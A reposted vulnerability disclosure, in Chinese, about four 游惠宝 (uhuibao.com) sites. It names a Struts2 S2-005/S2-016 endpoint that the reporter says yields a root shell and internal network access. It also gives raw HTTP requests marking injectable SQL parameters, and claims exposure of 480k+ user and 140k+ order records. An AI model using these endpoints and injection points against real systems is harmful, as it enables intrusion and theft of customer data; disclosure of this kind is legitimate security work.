神刀安全网

漏洞標題: 游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)(大陆地区)

漏洞詳情

披露狀態:

2016-04-19: 細節已通知廠商並且等待廠商處理中
2016-04-24: 廠商已經主動忽略漏洞,細節向公眾公開

大概描述:

詳細說明:

1、Getshell

游惠宝IOS APP,以下地方存在S2-005/S2-016漏洞,直接Getshell

code 区域
http://if.uhuibao.com:9090/interface/askApp.action

漏洞標題:  游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)(大陆地区)

Root权限,已进内网

漏洞標題:  游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)(大陆地区)

漏洞標題:  游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)(大陆地区)

2、SQL注入

1)站点:http://pay.uhuibao.com:8083/

以下地方存在SQL注入:(POST中的loginname,布尔盲注)

code 区域
POST http://pay.uhuibao.com:8083/SunspeedyPayment/VloginUser.action HTTP/1.1
Host: pay.uhuibao.com:8083
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://pay.uhuibao.com:8083/SunspeedyPayment/
Content-Length: 48
Cookie: JSESSIONID=675A3C973B8FB6B9E37629E175B61945
Connection: keep-alive

loginname=admin&loginpwd=admin&exchangLang=zh_CN

2)站点:http://e.uhuibao.com:8080/

以下地方存在SQL注入,POST中的channel,布尔盲注

code 区域
POST http://e.uhuibao.com:8080/ticket/eticket.action HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://e.uhuibao.com:8080/ticket/eticket.action
Cookie: vst=IE001tOillki/hE881nQVHSYL6xUh1PwpiEyekl6MJPr+Mg3i9snZutEIwZa+t7cC5Ia9EWxXTmDFJO70VcbrOm4BXC4QM00JEJjCneQAF4DC4G4=; JSESSIONID=3C1396A90044540EC6C51FFF2ABE659A; JSESSIONID=3C1396A90044540EC6C51FFF2ABE659A
Host: e.uhuibao.com:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

channel=TICKET_UHBAPP&format=json&message=message%3D%7B%22request_message%22%3A%7B%22req_type%22%3A%2205%22%2C%22message%22%3A%7B%22type%22%3A%221%22%7D%7D%7D&method=eticketrequest&sign=A3485240A2F74A515198E03E15723CE0&timestamp=2016-04-19+13%3A28%3A40&version=1.0

3)站点:http://ws.uhuibao.com:88/

POST中的Loginname,报错注入

code 区域
POST http://ws.uhuibao.com:88/OrclApp.asmx HTTP/1.1
SOAPAction: http://ws.uhuibao.com/MobileUserLoginDevice
Content-Type: text/xml
Content-Length: 359
Referer: http://ws.uhuibao.com:88/OrclApp.asmx
Host: ws.uhuibao.com:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<soap:Envelope xmlns:xsi="1&apos;&quot;" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><MobileUserLoginDevice xmlns="http://ws.uhuibao.com/"><LoginName><![CDATA[admin]]></LoginName><Password><![CDATA[2365675]]></Password><Deviceid></Deviceid></MobileUserLoginDevice></soap:Body></soap:Envelope>

漏洞驗證:

1、当前数据库用户,root

漏洞標題:  游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)(大陆地区)

2、所有数据库,共37个

漏洞標題:  游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)(大陆地区)

3、用户表和订单表,涉及14W+订单交易/48W+用户数据

漏洞標題:  游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)(大陆地区)

漏洞標題:  游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)(大陆地区)

修復方案:

请多指教~

版權聲明:轉載請註明來源 路人甲@烏雲

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞標題: 游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)(大陆地区)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址